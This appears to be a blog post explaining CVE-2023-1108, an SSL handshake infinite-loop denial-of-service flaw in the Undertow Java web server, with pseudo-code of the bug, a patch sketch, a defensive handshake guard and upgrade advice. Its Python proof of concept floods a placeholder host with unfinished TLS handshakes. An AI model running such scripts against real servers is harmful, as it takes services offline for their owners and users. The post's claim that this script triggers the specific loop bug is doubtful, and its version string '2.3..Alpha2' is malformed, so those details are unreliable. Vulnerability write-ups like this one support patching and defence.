CVE-2023-1108 - Denial-of-Service in Undertow via SSL Handshake Infinite Loop
A newly discovered vulnerability, CVE-2023-1108, affects the Undertow web server. This server is widely used behind application servers like WildFly and JBoss. This flaw can allow attackers to trigger a denial of service (DoS) by exploiting an infinite loop in the SSL handshake process, effectively making servers unresponsive. In this post, we'll break down what happened, how it works, and why it's important, all in simple, straightforward language.
What is Undertow?
Undertow is a flexible Java web server, often used for powering modern Java applications due to its lightweight and non-blocking nature. It's commonly shipped with products like Red Hat JBoss EAP and WildFly.
What is CVE-2023-1108?
- CVE-ID: CVE-2023-1108
Root Cause: Handshake Loop in SslConduit
The problem lies in the SslConduit class, which handles SSL/TLS handshakes. In normal operation, a handshake lets a client and server securely set up encryption before exchanging sensitive data. However, due to a logic error, the loop responsible for progressing the handshake may never exit under certain conditions, eating up CPU cycles and potentially hanging the whole server.
Here is a simplified version of what the bad code looked like:
```java
// Pseudo-code inspired by the original SslConduit.java
while (handshakeStatus == NEED_WRAP || handshakeStatus == NEED_UNWRAP) {
    doHandshakeStep();
    // Missing: check for changed handshakeStatus or loop breaker
}
```
In real code, failure to update or check handshakeStatus correctly can mean the loop just keeps going, never realizing that it should stop or give up.
How Can It Be Exploited?
An attacker can exploit CVE-2023-1108 by initiating an SSL/TLS connection but manipulating the flow in such a way that the server gets stuck in this handshake loop. For example, a client can:
- Force edge cases where the loop condition is never satisfied.
If attackers open multiple such connections, they can quickly tie up all the server threads or CPU, causing a denial of service.
Proof of Concept: Triggering the Issue
Below is a simple example using Python. It tries to open multiple SSL connections to the vulnerable server, sending partial handshakes, and then stops. If done in quick succession or at scale, this can hang or crash the server.
```python
import socket
import ssl
import time

HOST = 'target.server.com'
PORT = 8443

for i in range(50):  # Opens multiple connections
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        # Wrap socket in SSL, but do NOT complete handshake
        context = ssl.create_default_context()
        ssock = context.wrap_socket(s, server_hostname=HOST, do_handshake_on_connect=False)
        # Do not call ssock.do_handshake(), just leave it hanging
        print(f'Connection {i} opened and left in handshake...')
        time.sleep(0.5)
    except Exception as e:
        print(e)
```
> WARNING: This is for educational purposes on your own test environments only. Never target production systems you don't own!
- Availability: Services stall, time out, or crash.
- CPU/Thread Starvation: All server resources can be exhausted by dangling handshakes.
Fix and Mitigation
The authors fixed this by adding better state checks and breaking the loop if the handshake is stuck. The patch ensures the loop does not run indefinitely.
- Upgrade Undertow to 2.2.21.Final or 2.3..Alpha2, or any newer version.
- See Red Hat's security advisory for more info.
Example of the Patch (simplified pseudo-code)
```java
int loopLimit = 100;
while ((handshakeStatus == NEED_WRAP || handshakeStatus == NEED_UNWRAP) && loopLimit-- > 0) {
    doHandshakeStep();
    // Now the loop will break after 100 tries
}
// Because of the post-decrement, loopLimit is -1 only when the counter ran out;
// a handshake that completed on the last permitted step leaves it at 0.
if (loopLimit < 0) {
    throw new SSLException("Handshake loop limit exceeded, possible attack detected");
}
```
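As an added example (not Undertow's own code), here is the same guard written around a progress check rather than a bare try count: a handshake-driver loop that gives up when consecutive steps neither change the handshake status nor move any bytes, with a total-step backstop. The `HandshakeStatus` and `StepResult` types and the two scripted engines are constructed stand-ins for `SSLEngine` behaviour; it is Python so it runs stand-alone.

```python
from collections import namedtuple
from enum import Enum

# Modelled subset of javax.net.ssl.SSLEngineResult.HandshakeStatus (assumption, not Undertow code)
HandshakeStatus = Enum("HandshakeStatus", "NEED_WRAP NEED_UNWRAP FINISHED")
StepResult = namedtuple("StepResult", "status bytes_consumed bytes_produced")

class HandshakeStuckError(Exception):
    """Raised instead of spinning when the handshake stops making progress."""

def drive_handshake(step, max_idle_steps=8, max_total_steps=1000):
    """Call step() (stand-in for SslConduit.doHandshakeStep) until the handshake leaves
    NEED_WRAP/NEED_UNWRAP. Give up after max_idle_steps consecutive steps that change
    nothing, or max_total_steps overall. Returns the number of steps taken."""
    status = HandshakeStatus.NEED_UNWRAP  # a server starts by reading the ClientHello
    total = idle = 0
    while status in (HandshakeStatus.NEED_WRAP, HandshakeStatus.NEED_UNWRAP):
        result = step()
        total += 1
        # Progress = the engine moved bytes or changed state; a fixed try count alone
        # would also abort slow-but-legitimate clients, so idle steps are what we bound.
        progressed = (result.status != status or result.bytes_consumed > 0
                      or result.bytes_produced > 0)
        idle = 0 if progressed else idle + 1
        status = result.status
        if idle >= max_idle_steps:
            raise HandshakeStuckError(f"no handshake progress after {idle} steps in {status.name}")
        if total >= max_total_steps:  # backstop for a state that flaps without moving bytes
            raise HandshakeStuckError(f"handshake step limit {max_total_steps} exceeded")
    return total

def handshake_outcome(step, **limits):
    """('completed', steps) or ('stuck', reason): lets the caller log and close the connection."""
    try:
        return ("completed", drive_handshake(step, **limits))
    except HandshakeStuckError as exc:
        return ("stuck", str(exc))

def healthy_engine():
    """Constructed script of a server-side handshake that completes in four steps."""
    script = iter([StepResult(HandshakeStatus.NEED_WRAP, 200, 0),     # read ClientHello
                   StepResult(HandshakeStatus.NEED_UNWRAP, 0, 1200),  # wrote ServerHello..Finished
                   StepResult(HandshakeStatus.NEED_WRAP, 80, 0),      # read client Finished
                   StepResult(HandshakeStatus.FINISHED, 0, 60)])      # wrote server Finished
    return lambda: next(script)

def stuck_engine():
    """Constructed engine whose status never changes and moves no bytes (the CVE's loop case)."""
    return lambda: StepResult(HandshakeStatus.NEED_UNWRAP, 0, 0)
```

A server using this pattern closes the stuck connection and frees its worker thread instead of burning CPU, which is also the point at which to emit a log line that detection rules can count per source address.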
References & Further Reading
- National Vulnerability Database entry
- Undertow security fixes
- Red Hat CVE Page
- Undertow official site
Conclusion
CVE-2023-1108 is a classic example of how tiny mistakes in low-level code can create big vulnerabilities, especially in software as widely used as Undertow. If you use this server or products that embed it, update now to stay safe! Protect your vital web apps from simple but devastating denial-of-service attacks.
Timeline
Published on: 09/14/2023 15:15:00 UTC
Last modified on: 09/20/2023 20:16:00 UTC